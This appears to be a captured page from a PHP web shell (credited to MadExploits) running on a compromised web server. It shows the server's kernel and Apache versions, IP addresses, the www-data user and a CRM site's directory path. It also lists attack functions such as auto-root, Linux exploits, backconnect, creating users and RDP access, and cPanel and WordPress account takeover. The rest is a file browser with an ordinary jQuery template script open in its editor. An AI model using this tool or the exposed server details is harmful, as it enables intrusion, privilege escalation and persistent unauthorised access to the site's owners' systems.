Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.60
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
public /
js /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
ag-grid
[ DIR ]
drwxr-xr-x
cards
[ DIR ]
drwxr-xr-x
charts
[ DIR ]
drwxr-xr-x
datatables
[ DIR ]
drwxr-xr-x
editors
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
forms
[ DIR ]
drwxr-xr-x
modal
[ DIR ]
drwxr-xr-x
navs
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
pagination
[ DIR ]
drwxr-xr-x
pickers
[ DIR ]
drwxr-xr-x
popover
[ DIR ]
drwxr-xr-x
tooltip
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
components.js
2.44
KB
-rw-r--r--
customizer.js
10.62
KB
-rw-r--r--
documentation.js
604
B
-rw-r--r--
footer.js
905
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : components.js
/*========================================================================================= File Name: Components.js Description: For Generic Components. ---------------------------------------------------------------------------------------- Item name: Vuexy - Vuejs, HTML & Laravel Admin Dashboard Template Author: Pixinvent Author URL: http://www.themeforest.net/user/pixinvent ==========================================================================================*/ (function (window, document, $) { /***** Component Variables *****/ var alertValidationInput = $(".alert-validation"), alertRegex = /^[0-9]+$/, alertValidationMsg = $(".alert-validation-msg"), accordion = $(".accordion"), collapseTitle = $(".collapse-title"), collapseHoverTitle = $(".collapse-hover-title"), dropdownMenuIcon = $(".dropdown-icon-wrapper .dropdown-item"); /***** Alerts *****/ /* validation with alert */ alertValidationInput.on('input', function () { if (alertValidationInput.val().match(alertRegex)) { alertValidationMsg.css("display", "none"); } else { alertValidationMsg.css("display", "block"); } }); /***** Carousel *****/ // For Carousel With Enabled Keyboard Controls $(document).on("keyup", function (e) { if (e.which == 39) { $('.carousel[data-keyboard="true"]').carousel('next'); } else if (e.which == 37) { $('.carousel[data-keyboard="true"]').carousel('prev'); } }) // To open Collapse on hover if (accordion.attr("data-toggle-hover", "true")) { collapseHoverTitle.closest(".card").on("mouseenter", function () { $(this).children(".collapse").collapse("show"); }); } // Accordion with Shadow - When Collapse open $('.accordion-shadow .collapse-header .card-header').on("click", function () { var $this = $(this); $this.parent().siblings(".collapse-header.open").removeClass("open"); $this.parent(".collapse-header").toggleClass("open"); }); /***** Dropdown *****/ // For Dropdown With Icons dropdownMenuIcon.on("click", function () { $(".dropdown-icon-wrapper .dropdown-toggle i").remove(); $(this).find("i").clone().appendTo(".dropdown-icon-wrapper .dropdown-toggle"); $(".dropdown-icon-wrapper .dropdown-toggle .dropdown-item").removeClass("dropdown-item"); }); /***** Chips *****/ // To close chips $('.chip-closeable').on('click', function () { $(this).closest('.chip').remove(); }) })(window, document, jQuery);
Close